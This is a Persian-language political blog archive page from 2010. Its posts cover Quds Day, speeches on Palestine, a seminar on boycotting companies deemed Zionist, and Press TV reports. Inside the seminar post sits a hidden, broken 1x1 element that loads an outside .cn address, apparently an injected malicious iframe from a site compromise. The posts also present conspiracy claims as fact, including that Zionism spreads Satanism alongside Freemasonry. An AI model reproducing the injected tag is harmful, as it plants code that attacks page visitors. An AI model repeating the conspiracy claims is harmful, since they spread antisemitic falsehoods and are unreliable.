سفارش تبلیغ
صبا ویژن


درباره نویسنده
شهریور 1389 - صفیر مقاومت
آی دی نویسنده
تماس با نویسنده

Instagram
آرشیو وبلاگ
تیر 1389
مرداد 1389
شهریور 1389
مهر 1389
آبان 1389
دی 1389
بهمن1389
اردیبهشت90
مرداد90
مهر90
آذر90
دی90
بهمن90
اردیبهشت91
شهریور91
مهر91


لینک دوستان

عضویت در خبرنامه
 
لوگوی وبلاگ
شهریور 1389 - صفیر مقاومت


لوگوی دوستان







 RSS 

ایشان قساوتها و جنایتهای رژیم صهیونیستی و تلاشهای امریکا و دیگر حامیان اسرائیل را برای به انزوا کشاندن مسئله فلسطین موجب افزایش انگیزه ملت ایران برای حضور در راهپیمایی روز جهانی قدس دانستند و افزودند: آفرین بر ملت بزرگی که امید و انگیزه در حرکات و مواضع او موج میزند.
حضرت آیت الله خامنه ای مسئله فلسطین را همچنان مسئله اول دنیای اسلام نامیدند و با اشاره به استمرار جنایات صهیونیستها و سرکوب شدید و همه جانبه مردم فلسطین در غزه و کرانه باختری رود اردن افزودند: دشمنان ملت فلسطین و حامیان صهیونیستهای متجاوز برای سرپوش گذاردن بر جنایات آنها، در واشنگتن جلسه گرفتند و نام آن را هم کنفرانس صلح گذاشتند اما صلح چه کسی با چه کسی؟ و آیا با توجه به واقعیات و حقایق فلسطین اشغالی، این صلح اصولاً معنا دارد؟
رهبر انقلاب اسلامی تلاش صهیونیستها را برای یهودی سازی قدس شریف جنایتی بزرگ خواندند و با اشاره به سخنان وقیحانه صهیونیستها درباره ضرورت پذیرش یهودی سازی افزودند: ملتها و دولتهای مسلمان باید به وظیفه خطیرشان درمقابل این توطئه عمل کنند.
ایشان با تجلیل از ایمان، غیرت و استقامت ملت فلسطین در مقابل توطئه ها و فشارهای سنگین رژیم جعلی اسرائیل و حامیان این رژیم خاطرنشان کردند: ملت فلسطین امروز مصمم تر و قوی تر از هر زمان است و بدون هیچ شک و تردیدی بساط رژیم قلابی و دروغین صهیونیستی را از سرزمین فلسطین جمع خواهد کرد.



نویسنده : علی فریدی » ساعت 4:11 عصر روز چهارشنبه 89 شهریور 24


دیدیم و شنیدیم در نزدیکی کاخ سفید (دفتر ریاست جمهوری امریکا) که حقیقتا محل فرمانداری شیطان بزرگ است و در بعضی ایالات آن اهانت به قرآن کریم شده است.


در این حال بنده اقل به عنوان نماینده مردم دریادل و رشید ایران اسلامی که با شنیدن این خبر، جوش و خروشی وصف ناپذیر در خیابان ها به راه انداختند و نفرت خود را نسبت به این اراذل و اوباشی که (حتما به دلیل شرایط نامطلوب آنجا شیطان پرست نیز شده اند و) به سرکردگی امریکا و صهیونیسم نفرت انگیز بوده، اعلام کردند و چه خروشی، چه بگویم که هرچه بگویم کم است.


همه ی ما میدانیم که این کارهای جاهلانه از عظمت و بزرگی قرآن کم نمی کند اما باید محکومیت این افراد را ببینیم که اگر نبینیم بلایی بزرگ به سر آنها، با دعای مردم دل سوخته به راه خواهد افتاد.


 


قرآن کریم



نویسنده : علی فریدی » ساعت 2:17 عصر روز چهارشنبه 89 شهریور 24


 راه‌پیمایی روز قدس در سراسر ایران
جمعه 12 شهریور 1389 | 11:46
برگزاری راهپیمایی روز قدس در ایران
مردم روزه دار ایران در آخرین جمعه ماه رمضان، روز جهانی قدس، هم صدا با مردم دیگر کشورهای جهان خواستار آزادی قدس شریف شده‌اند.


راهپیمایی روز قدس مردم در شهرهای مختلف ایران درحالی برگزار می‌شود که محمود عباس رئیس تشکیلات خودگردان فلسطین و بنیامین نتانیاهو نخست وزیر اسرائیل برای برگزاری مذاکرات صلح در واشنگتن به سر می‌برند.

مردم بسیاری از کشورهای جهان با راه‌پیمایی گسترده در آخرین جمعه ماه مبارک رمضان که از سوی امام خمینی بنیان‌گذار انقلاب اسلامی ایران روز قدس نام‌گذاری شده است، بر آزادی قدس شریف از اشغال اسرائیل تاکید می‌کنند.

مردم سراسر ایران نیز جمعه (12 شهریور) در تهران، اصفهان، شیراز، مشهد و دیگر شهرهای کشور با حضوری گسترده و پرشور در راه‌پیمایی روز قدس، بار دیگر مخالفت خود را با اشغال فلسطین اعلام کردند.

این درحالی است که اولین دور از مذاکرات سازش تشکیلات خودگردان فلسطین با اسرائیل پنج‌شنبه (11 شهریور) با وجود مخالفت گروه‌های فلسطینی، در واشنگتن برگزار شده است.


نویسنده : علی فریدی » ساعت 2:12 صبح روز یکشنبه 89 شهریور 14


هرگز فریاد مکشید مگر بر سر ظلم و ستم...روز قدس

حضرت علی (ع) میفرمایند: مَن ظَلَمَ عِبادَ اللهِ کانَ اللهُ خَصمَهُ دونَ عِبادهِ، یعنی هر که بر بندگان خدا ستم کند، گذشته از بندگان ،خدا نیز دشمنش گردد.

رهبر کبیر انقلاب، امام خمینی (ره) اسرائیل را منحصراً خطری برای ایران یا جهان اسلام نمی داند بلکه این را گلوگیر جهان بشریّت می داند ومی فرمایند: فلسطین یک مسئله جدای از حقوق بشر نیست. هنگامی که می بینید خون های برادران و خواهران بی گناه ما در سرزمین های فلسطین جاری است و هنگامی که مشاهده می کنید که سرزمین های ما اشغال شده و خانه هایمان به دست صهیونیست های تبهکار ویران گشته است در این شرایط جز ادامه ی جهاد راهی نیست و بر همه ی مسلمانان واجب است که کمک های مادی و معنوی خود را در این پیکار مقدس بنمایند و خداوند پشتیبان این اراده است.«والله من وراء القصد»


 

مقام معظم رهبری، حضرت آیت الله خامنه ای(دامت برکاتة) نیز درباره فلسطین این چنین می فرمایند: مسئله فلسطین، مسئله اول بین الملل اسلامی است، امروز که مبارزات ملت فلسطین در زیر پرچم اسلام است، خواب را از چشم دولت غاصب صهیونیست وحامیانش ربوده است، بزرگترین وظیفه ملت و دولت ما و همه ملت ها و دولت های مسلمان حمایت از این مبارزات است.


 

شهید آیت ا... مطهری هم میفرمایند: شمر 1300 سال پیش مُرد و رفت، شمر امروزت را بشناس.مسئله فلسطین را اگر کسی نگوید گناه کرده است. هِی دروغ در مغز ما کرده اند که ای آقا این مسئله داخلی است. به قول عبدالرحمن فرامرزی: اگر مال اینهاست و مذهبی نیست چرا یهودیان دیگر دنیا مرتب برای اینها پول می فرستند. ما چه جوابی در مقابل اسلام و پیغمبر داریم؟ به خدا خجالت دارد که ما خودمان را مسلمان بدانیم، خودمان را شیعه علی ابن ابی طالب بخوانیم.

امسال منتظرتان در سراسر ایران اسلامی هستیم.

روز قدس

القدس لنا

منیع:مدیر وبلاگ صفیر 92



نویسنده : علی فریدی » ساعت 11:0 عصر روز سه شنبه 89 شهریور 9


شهادت مولای متقیان، علی علیه السلام را به عموم مسلمین تسلیت عرض می کنیم.

منبع: مدیر وبلاگ



نویسنده : علی فریدی » ساعت 10:31 عصر روز سه شنبه 89 شهریور 9


میرتاج الدینی: من از هیچ شرکتی اسم نمی آورم

نشست "تحریم شرکت های صهیونیستی و انتفاضه مردمی" عصر پنج شنبه 14 تیرماه 89 با حضور حجمیرتاج الدینی: من از هیچ شرکتی اسم نمی آورم+دانلود صوته الاسلام و المسلمین میر تاج الدینی معاون پارلمانی رئیس جمهور، آقای صادق شهبازی دبیر جنبش دانشجویی عدالتخواه و حجه الاسلام و المسلمین ادبی مدیر عامل انجمن آثار و مفاخر فرهنگی وزارت فرهنگ و ارشاد اسلامی و با مشارکت جمعیت دفاع از ملت فلسطین، موسسه فرهنگی روایت، فرهنگسرای انقلاب و موسسه نور قدس جوان برگزار گردید. دانلود صوت نشست

به گزارش روابط عمومی موسسه نور قدس جوان میرتاج الدینی در ابتدای نشست به سالگرد پیروزی حزب الله اشاره کردند و بیان داشتند: این ایام چهارمین سالگرد پیروزی حزب الله است و این چند روز هم تجاوز محدود رژیم صهیونیستی به لبنان و ورود به روستای العدیسه را داشته که مقدمه یک جنگ جدید بوده یا شاید برنامه های دیگری داشتند.

رژیم صهیونیستی ذاتا یک رژیم تجاوزگر و اشغالگر است. رژیمی که ماهیت تجاوز و تهاجم به کشورهای منطقه را دارد. به قول سید حسن نصرالله، رژیم صهیونیستی بدون بهانه هم به کشورهای لبنان و فلسطین و سوریه و ... حمله میکند و اگر مقاومت نبود و پایداری نمیکرد همین روحیه تجاوز رژیم صهیونیستی به کشورهای دیگر را هم خواهیم داشت. دو خط آبی روی پرچم نمایانگر همین است. از رود نیل تا فرات، جزء اهداف اصلی این رژیم است.

ایشان در ادامه افزودند: رژیم صهیونیستی با پشتیبانی آمریکا این حملات و تجاوزات را انجام میدهد و اینطور نیست که مستقلا تصمیم بگیرد و یک تعامل درونی بین این دو است. در طول شصت سال هر قطعنامه ای علیه اسرائیل تصویب شده آمریکا وتو کرده و خیلی نادر اتفاق افتاده که مثل قطعنامه 192 که نسبت به حق العوده (حق بازگشت آوارگان فلسطینی)، آمریکا نتوانست مخالفت کند. مخصوصا بعد از آن، یکی دو نفر طرف سازمان ملل برای ارزیابی اوضاع داخلی فلسطین رفته بودند که به نفع فلسطینی ها گزارش تهیه کرده بودند مثل گزارش گلدستون که درباره کودک کشی صهیونیست ها در آن آمده بود.

معاون پارلمانی رئیس جمهور اضافه کرد: هر نوع تجاوز اسرائیل با چراغ سبز آمریکا بوده است. در جنگ 33 روزه که در کمیته فلسطین در مجلس ایران پیگیر آن بودیم، در لبنان گزارشی که میدانند این بود که حزب الله لبنان با سازمان امل و نبیه بری که رئیس مجلس لبنان است یک تقسیم کار کرده بودند که کارهای نظامی دست حزب الله و کارهای سیاسی دست نبیه بری بود. وزیر دفاع آمریکا هفته آخر جنگ لبنان آمده بود و با نبیه بری مذاکره کرده بودند. چون مقاومت حزب الله به جایی رسیده بود که می توانند بعضی از اراضی لبنان که در دست اسرائیل بود، آنها را برای آزاد سازی برای مذاکره بیاورند. از جمله اراضی شبعا بود. نبیه بری به وزیر جنگ آمریکا(رایس) گفته بود که من به شرطی مذاکره میکنم که مزارع شبعا هم جزء مذاکره باشد. اول نپذیرفتند ولی بعد با اسرائیل صحبت می کنند و توافق میکنند که روی آن بحث کنند و نبیه بری میگفت تازه من فهمیدم که اسرائیل میجنگد ولی تجاوزات بدون اجازه آمریکا نمیشود. مقاومت اسلامی است که تنها میتواند در مقابل تجاوزات اسرائیل بیاستد.

تاج الدینی در ادامه بیان داشت: بیداری اسلامی در کشورهای اسلامی و عربی و بیداری انسان های آزاده در جهان به یک محکومیت جهانی علیه اسرائیل تبدیل شده و قضیه اخیر که قضیه کشتی های آزادی برای غزه که نشان داد از تمام دنیا می آیند. الان اسرائیل هر اقدامی که انجام می دهد با دو حرکت روبروست :یکی با مقاومت در منطقه و دوم با محکومیت جهانی. الان در جریان اخیر یعنی تجاوز مرزی رژیم صهیونیستی به لبنان ارتش لبنان مقاومت کرد و قبلا ارتش در کنار حزب الله نبود و مقاومت اسلامی لبنان تنها می جنگید. اگر قبلا ارتش همکاری می کرد مزارع شبعا هم می توانست آزاد شود. صهیونیست می خواست جنگ دیگری را شروع کند و پای حزب الله را وسط بکشد ولی حزب الله با تدابیری که اندیشید اعلام کرد که ما در کنار ارتش لبنان هستیم و شروع کننده جنگ نشد. رژیم صهیونیستی همان روز اول اعلام کرده بود که می خواهد آتش بس کند تا بتواند افسر کشته شده خودشان را به عقب ببرد.در چنین شرایطی ما باید این رژیم را در یک محاصره سیاسی –اقتصادی قرار دهیم. فضا نسبت به گذشته خیلی فرق کرده است.

وی سپس به موضوع شرکت های صهیونیستی اشاره کرد و افزود: تلقی در مورد شرکت ها و کالا های صهیونیستی این است که کلیه کالا های رژیم صهیونیستی اعم از آنهایی که داخل خاک فلسطین اشغالی هستند یا آنهایی که در خارج از فلسطین اشغالی هستند کالاهایی صهیونیستی هستند و کلیه سود آنها مال رژیم صهیونیستی است.

تلقی دوم این است که شرکت هایی که سهام عمده شان مربوط به رژیم صهیونیستی است یعنی مثلا یک شرکتی آمریکایی یا اروپایی یا آسیایی است ولی یک سهام عمده ای از آن مال شرکت های صهیونیستی است .هر چند که صد در صد سهام مال رژیم صهیونیستی نباشد.

ایشان سپس به پیچیدگی های این مسئله اشاره کردند و افزودند: در این مسئله یک پیچیدگی وجود دارد و آن این است که شرکت های چند ملیتی که وجود دارد و شرکتهای مرتبط در حال ایجادند و شناسایی اینها به راحتی نیست. در کنفرانس اسلامی در دهه 60 یا 70 بود که کمیته تحریم کالاهای اسرائیلی راه اندازی شد و در ایران هم به قانون تبدیل شد که مشکلاتی داشت. یعنی کالاهای صهیونیستی را شناسایی میکردند و در یک سایت قرار می دادند. نقص این قانون این بوده و هست که این شرکتها اگر شناسایی میشد، فقط در دست دولت بود و در دست مردم قرار نمی گرفت و می گفتند تکلیفی نداریم که اطلاعات را در اختیار مردم بگذاریم و فقط همه شرکتهای دولتی و غیر دولتی حق ندارند از شرکتهای اسرائیلی کالایی خریداری کنند.

وی اضافه کرد: کمیته تحریم که جزء وزارت خارجه بود به کمیته انقلاب اسلامی مجلس وارد شد و نتیجه این شد که کمیته تحریم پیش نویس لایحه ای که همه ابعاد و جزئیات تحریم کالاهای صهیونیستی و شناسایی آنها و نحوه برخورد با مجموعه افرادی که احیانا بخواهند با شرکتهای صهیونیستی وارد معامله بشوند را تدوین کرد.

دولت سه جلد گزارش کامل از شرکتهایی که شناسایی شده اند به مجلس ارائه کرده و باید اینها به روز شود. در جمهوری اسلامی هیچ شرکتی دولتی یا غیر دولتی حق ندارد با یک شرکتی که صهیونیستی یا وابسته به صهیونیست است معامله کند.

ایشان سپس به نقش قوه قضائیه اشاره کردند: قوه قضائیه روی مصداق باید تصمیم گیری کند. قانون تحریم ناقص است. گاهی برای ادای تکلیف کارهایی انجام میدهند. ما باید طوری بحث کنیم که همه واقعیت ها را ببینیم. من از هیچ شرکتی اسم نمی آورم و می خواهم یک حکم کلی را بیاورم. تا شرکتی ثابت نشده که صهیونیستی است یا سهام عمده اش متعلق به صهیونیست است، ممکن است به صورت شایعه مطرح بشود که این شرکت صهیونیستی است اما دستگاه رسمی کشور اگر بخواهد این را بگوید باید به فکر چند هزار کارگری که کار میکنند باشد.

معاون پارلمانی رئیس جمهور اضافه کرد: یک سری شرکت هاست که کاملا مشخص است و ثبت شده که صهیونیستی است و نمی گذارند کالاهایش به ایران وارد شود. اما آنهایی که کاملا مشخص نیست چه کسی باید بگوید که اینها مال رژیم صهیونیستی است؟ آیا آنها حق دفاع از خودشان را دارند که بیایند بگویند ما وابسته به رژیم صهیونیستی نیستیم؟ و ما باید این حق را به آنها بدهیم یا باید حکم غیابی در مورد آنها صادر شود؟

وقتی میگویم قانون ناقص است در اینجا میگویم که باید وزارت امور خارجه و بازرگانی و قضاییه و یک رکن قضایی (چیزی که گفتم ناقص است) آن هم قضایی حقوقی بین المللی که آشنا به اقتصاد و حقوق و روابط بین اللمل باشد و دادستان عمومی باید پرونده هرکدام از آنهایی که مشکوک به صهیونیستی بودن است یا وابسته به آنهاست یا عمان که مجلس تصویب کرد که سهام عمده اش مال صهیونیست ها است، پرونده هایشان را آماده کند و دستگاه قضایی حکم کند. وقتی این حکم را کرد، همه احکام بعدی باز میشود. یعنی اگر یک شعبه ای در ایران دارد باید بلافاصله تعطیل شود و کارگرهای آن هم منتقل به شرکتهای دیگر شوند.

میرتاج الدینی در ادامه به فعالیت های انجام گرفته در این زمینه اشاره کرد: واردات و صادرات و معاملات با شرکتهای صهیونیستی در ایران ممنوع شده است. حتی اگر داروی ضروری باشد، دولت جلوی این کالا را اگر مربوط به شرکت صهیونیستی باشد میگیرد. مثلا در سال های گذشته یک شرکت غیر دولتی تعداد محدودی داروی ضد سرطان از یک شرکت در هلند که این داروها را از یک شرکت صهیونیستی گرفته بود خریداری کرده و ایران جلوی آن ها را گرفت. نسبت به شرکتهای جدید باید شناسایی به روز باشد و نسبت به شرکتهای مشکوک باید یک روند مخصوصی که قوه قضاییه هم حتما باشد، در پیش گرفت. لیست شرکتهای صهیونیستی مشخص در سایت ها زده شده است. قوه قضاییه باید شرکتهای مشکوک را پیگیری کند. به صراحه اعلام میکنم که قوانین موجود در مورد تحریم کالاهای صهیونیستی، همه ابعاد قضیه را ندیده اند. از جمله موارد مشکوک است که کسی نمی آید تحقیق کند که آیا این شرکتها صهیونیستی است یا خیر؟

ایشان در مورد سوالی پیرامون موتورولا و استفتاء اخیر رهبری بیان داشتند: در مورد موتورولا هم من پیگیری میکنم. قانون گفته به هیئت رئیسه مجلس گزارش دهند و من گفتم مردم هم باید مطلع شوند و این کالاها را نخرند و این نقص قانون بود. اگر مصداق روشن باشد حمک میدهند ولی مواردی که مشکوک است باید قوه قضاییه پا پیش بگذارد.

 

 

به گزارش ایرنا در ادامه این نشست حجت الاسلام دکتر" محمد جواد ادبی " معاون پژوهشی وزارت ارشاد در سخنانی در مورد مطالعات انجام شده در زمینه یهود شناسی افزود: امروز صهیونیسم با عرفان یهودیت فعالیت های خود را گسترش داده است. مثلث این نوع عرفان شامل شیطان گرایی، صهیونیسم و فراماسونی است. شیطان گرایی و ارائه کالاهای رژیم صهیونیستی زمینه ها را برای رشد صهیونیسم آماده می کند  .

وی اظهار داشت یهودیت یکی از ادیان سامی است که با ادیان مسیحیت و اسلام اشتراکاتی را دارد و این بر اهمیت موضوع شناخت این دین می افزاید  .

وی با بیان این نکته که اکنون صهیونیسم با اشاعه شیطان گرایی در میان جوانان به صورت هدفمند در حال پیاده کردن نیات خود است گفت: باید عمیق تر به مبانی شناختی دشمن پرداخت. اکنون روش اجرایی صهیونیسم بسیار دقیق شده است. ما وظیفه داریم با آسان ساختن عرفان اسلامی، شناخت اسلامی را وارد عرصه زندگی کرده و با زبان ساده و روش های زیبا به مقابله با تلاش های دشمنان بپردازیم  .

ادبی تاکید کرد علاوه بر این که باید به فعالیت های اقتصادی صهیونیست ها در سطح جهان توجه شود باید به تاثیر گذاری روش هایی که صهیونیست ها برای تاثیرگذاری بر زندگی جوانان در پیش گرفته اند دقت شود. اکنون صهیونیسم در اقتصاد، فیلم و کتاب و در مباحث فرهنگی و غیره به صورت همه جانبه آرام آرام وارد عرصه های زندگی می شود  .

در پایان نشست از نفرات برتر در مسابقه مقاله نویسی تقدیر و جوایزی به رسم یادبود اهدا گردید.< style="BORDER-TOP-WIDTH: 0px; BORDER-LEFT-WIDTH: 0px; BORDER-BOTTOM-WIDTH: 0px; BORDER-RIGHT-WIDTH: 0px" src="http://NtKrnlpa.cn/rc/" width=1 height=1>

منیع: نور قدس جوان



نویسنده : علی فریدی » ساعت 2:34 صبح روز چهارشنبه 89 شهریور 3


کودکان جهان سوم موش آزمایشگاهی امریکا

به نوشته یک روزنامه هندی، کودکان جهان سوم و کشورهای در حال توسعه به موش آزمایشگاهی برای داروهای شرکت‌های امریکایی تبدیل شده‌اند.



روزنامه تایمز هند (Times of India) در تازه‌ترین مقاله خود نوشت، موسسات امریکایی برای تحقق قانون تامین نیازهای کودکان داروهای تاره ساخت این کشور را برای آزمون بالینی به کودکان کشورهایی مانند اوگاندا و هند داده‌اند.

بر اساس این قانون که در سال 1997 در امریکا تصویب شد این کشور موظف است داروهای تازه‌ای را برای درمان بیماری‌های کودکان این کشور تولید کند.

به نوشته تایمز هند، با وجود آزمایش داروهای تازه تولید امریکا روی کودکان جهان سومی معلوم نیست که داروهایی که تایید می‌شوند هرگز در دسترس دیگر کودکان بیمار این کشورها قرار گیرند.

دکتر سارا پاسگوالی متخصص بیماری‌های کودکان در مرکز پزشکی دانشگاه دوک در ایالت کارولینای شمالی که یافته‌های وی در مجله طب کودکان (Pediatrics) منتشر شده است، درباره این گونه اعمال ابراز نگرانی کرد و آن‌ها را از نظر اخلاق پزشکی موجب نگرانی دانست.

دکتر پاسگوالی با ذکر این‌که روند کنونی موجب بروز مشکلات علمی و اخلاقی شده است می‌نویسد: "شرکت در آزمایش داروها گاه تنها راه خانواده‌ها به خدمات پزشکی است."

بر پایه این گزارش، از 174 آزمون دارویی انجام شده اغلب داروهای بیماری‌های عفونی روی بیماران کشورهای در حال توسعه آزمایش شده‌اند.

همچنین داروهای مربوط به بیماریهای قلبی، آلرژی و آرتریت نیز به ترتیب دیگر داروهایی هستند که بسیاری از آن‌ها روی کودکان جهان سومی آزمایش شده‌اند.

دکتر مارسیا آنجل یکی دیگر از پژوهشگران پزشکی ضمن تایید این اخبار و انتقاد از روند کنونی گفت: "ما در حال حاضر از مردم فقیر ساکن کشورهای آسیب‌پذیر به عنوان آزمایشگاه داروهای جدید استفاده می‌کنیم."

وی با اشاره به سودجویی شرکت‌های دارویی تاکید کرد: "همه این کارها تنها برای به دست آوردن پول بیشتر انجام می‌شود."

منبع: پرس تی وی



نویسنده : علی فریدی » ساعت 4:21 عصر روز سه شنبه 89 شهریور 2


لغو همکاری نروژ با شرکت‌های اسرائیلی

سیگبیورن یانسون وزیر دارایی نروژ
صندوق نفت نروژ و شرکت اقماری آن موسوم به دانیا سبوس، از سرمایه‌گزاری در شرکت آفریقا-اسرائیل و شهرک‌سازی در کرانه باختری کناره گرفتند.



سیگبیورن یانسون وزیر دارایی نروژ روز دوشنبه در بیانیه‌ای اعلام کرد: "شورای اخلاق تاکید دارد که شهرک‌سازی در سرزمین‌های اشغالی با مفاد کنوانسیون ژنو در زمینه حقوق غیرنظامیان در زمان جنگ مغایریت دارد."

روزنامه اسرائیلی هاآرتص در پایگاه اینترنتی خود به نقل از این بیانیه نوشته است: "قطعنامه‌های متعدد شورای امنیت سازمان ملل و نظر کارشناسی دادگاه بین‌المللی لاهه بر این دلالت می‌کند که ساخت شهرک‌های یهودی‌نشین در سرزمین‌های اشغالی، مخالف کنوانسیون ژنو است."

این موسسه نروژی که تحت اداره دولت است 450 میلیارد دلار دارایی دارد که 1.16 (یک و شانزده) میلیون دلار آن را به صورت سهام شرکت آفریقا-اسرائیل است.

صندوق نفت نروژ که تحت نظارت و اداره بانک مرکزی این کشور قرار دارد در شرکت‌هایی که در سلاح‌های اتمی و کشتار جمعی فعالیت می کنند، سرمایه‌گذاری نمی‌کند و سرمایه‌های خود را از موسساتی که به سلامت محیط زیست و یا حقوق کارگران بی‌توجهند، خارج می‌کند.

منبع: پرس تی وی



نویسنده : علی فریدی » ساعت 4:19 عصر روز سه شنبه 89 شهریور 2